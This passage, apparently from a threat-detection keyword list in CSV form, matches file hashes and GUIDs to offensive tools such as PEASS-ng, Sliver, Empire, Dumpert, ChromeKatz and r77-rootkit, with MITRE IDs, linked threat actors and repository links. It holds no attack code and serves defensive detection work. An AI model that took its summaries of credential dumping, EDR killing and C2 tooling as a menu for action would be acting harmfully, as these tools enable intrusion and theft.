"*71d8d1a4ae71b316caf1fae383f7f44aa55d4375c4a0ce08c74ba649251af73a*",".{0,1000}71d8d1a4ae71b316caf1fae383f7f44aa55d4375c4a0ce08c74ba649251af73a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28853" "*71da0d5262e6fdc248d1e1a9de2ea99d4ebf6f3bf629dfda1cc356e60669e64b*",".{0,1000}71da0d5262e6fdc248d1e1a9de2ea99d4ebf6f3bf629dfda1cc356e60669e64b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28855" "*71db9ab725d24be869c01d97f1557548766eb06d0bd2891557d6388628f9ada6*",".{0,1000}71db9ab725d24be869c01d97f1557548766eb06d0bd2891557d6388628f9ada6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28856" "*71dd1a83975bb7020d3286003f6e0caa21f744f6b9ac77199e59ac5900a957c1*",".{0,1000}71dd1a83975bb7020d3286003f6e0caa21f744f6b9ac77199e59ac5900a957c1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28857" "*71e371c38e27f1f755a04b2cc3bbe1725c1af2d8d517e96d1702a57e594ba27b*",".{0,1000}71e371c38e27f1f755a04b2cc3bbe1725c1af2d8d517e96d1702a57e594ba27b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28859" 
"*71e42659e0e9e225d76c33796093aaf32bc1f29359a6f8a4105b6e07c1c10df6*",".{0,1000}71e42659e0e9e225d76c33796093aaf32bc1f29359a6f8a4105b6e07c1c10df6.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28860" "*71eb55cc0de1ddeff8b130ab5744a895f30fbc1b58b4a6d12741311415234ad3*",".{0,1000}71eb55cc0de1ddeff8b130ab5744a895f30fbc1b58b4a6d12741311415234ad3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28861" "*71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951*",".{0,1000}71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28862" "*7202dbae30292ab2e370ff0fbcb4cdb5ef765e1e290968f7222d65c24e4645ba*",".{0,1000}7202dbae30292ab2e370ff0fbcb4cdb5ef765e1e290968f7222d65c24e4645ba.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","28864" "*7212755666c85ed4416a5ed2f317777d7fbf6cb65f42041949272fd3518a7566*",".{0,1000}7212755666c85ed4416a5ed2f317777d7fbf6cb65f42041949272fd3518a7566.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28866" "*72147820461101ca9687ef5177cafad482953946d1b93c54c1cfc69a953496ae*",".{0,1000}72147820461101ca9687ef5177cafad482953946d1b93c54c1cfc69a953496ae.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","28867" "*7215dd73a9efcd1f85066a3d6d496a80cad0911b409847b524d4111e520c5d1a*",".{0,1000}7215dd73a9efcd1f85066a3d6d496a80cad0911b409847b524d4111e520c5d1a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28869" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28870" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28871" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28872" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered 
Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28873" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28874" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28875" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28876" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28877" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28878" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28879" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28880" 
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28881" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28882" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28883" "*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28884" "*7219BFA2-5DA4-4608-A3FC-643B7E87E77A*",".{0,1000}7219BFA2\-5DA4\-4608\-A3FC\-643B7E87E77A.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28886" "*7223F9B2-17A2-432B-ADAC-51B1E35681DB*",".{0,1000}7223F9B2\-17A2\-432B\-ADAC\-51B1E35681DB.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28887" "*7227a5e6e3bde7aab29245076b4c216d366ebbc0a116d4c2286c4bfb226fdd38*",".{0,1000}7227a5e6e3bde7aab29245076b4c216d366ebbc0a116d4c2286c4bfb226fdd38.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","28888" "*722e522f4029a9e0eb3ce298d28949e304b797d242cd4ae8f81e0530ca0acc8f*",".{0,1000}722e522f4029a9e0eb3ce298d28949e304b797d242cd4ae8f81e0530ca0acc8f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","28890" 
"*722f4e5abe79cbd2fa8cc52459494082fdbdcffbd629d7e04907b4c1c8575ca9*",".{0,1000}722f4e5abe79cbd2fa8cc52459494082fdbdcffbd629d7e04907b4c1c8575ca9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28891" "*72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb*",".{0,1000}72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28892" "*7236273a942e25e236e68c1010b9a4a890bdcba93aa8d41237e70422203e4020*",".{0,1000}7236273a942e25e236e68c1010b9a4a890bdcba93aa8d41237e70422203e4020.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28893" "*723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac*",".{0,1000}723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28895" "*723D2DE5B3168EE39FAADD70DCCE691FAE5968D446B8CF47AEA7B29782C02D77*",".{0,1000}723D2DE5B3168EE39FAADD70DCCE691FAE5968D446B8CF47AEA7B29782C02D77.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28896" "*723d6f2d441c021b360b85f7f78b85290693cf6abf1376ae93cdac06832edeb2*",".{0,1000}723d6f2d441c021b360b85f7f78b85290693cf6abf1376ae93cdac06832edeb2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28897" "*723dfeeb1318c43343f21b49f3ae06a9b3d5e2d4ae5dda61fb57bee39a7b30da*",".{0,1000}723dfeeb1318c43343f21b49f3ae06a9b3d5e2d4ae5dda61fb57bee39a7b30da.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 
- T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","28898" "*724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809*",".{0,1000}724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28899" "*7261bd93161cfe191e354152d489c3721e41d84a87d6c1af7eaa4dc0c75ab3ff*",".{0,1000}7261bd93161cfe191e354152d489c3721e41d84a87d6c1af7eaa4dc0c75ab3ff.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28902" "*7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e*",".{0,1000}7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - 
T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#filehash","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","28904" "*726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a*",".{0,1000}726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","28905" "*7270493d60dcc3d13246558e2d6784a4ff5c45d8d6caaa255a3692ea1640c191*",".{0,1000}7270493d60dcc3d13246558e2d6784a4ff5c45d8d6caaa255a3692ea1640c191.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28907" "*7271AFD1-10F6-4589-95B7-3ABF98E7B2CA*",".{0,1000}7271AFD1\-10F6\-4589\-95B7\-3ABF98E7B2CA.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","28909" "*727a1d04-70f4-4148-9120-d06510a62a9a*",".{0,1000}727a1d04\-70f4\-4148\-9120\-d06510a62a9a.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense 
Evasion","https://github.com/keowu/BadRentdrv2","1","0","#GUIDproject","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","28910" "*7281b10dd085f5ffe91de5fc1139d1bbf04cc080d542e0a57ae9358eca94f705*",".{0,1000}7281b10dd085f5ffe91de5fc1139d1bbf04cc080d542e0a57ae9358eca94f705.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28914" "*72882da20b48bcb7248d777f11d7ef439fbcbd153c8c5cd66946317d27597392*",".{0,1000}72882da20b48bcb7248d777f11d7ef439fbcbd153c8c5cd66946317d27597392.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames 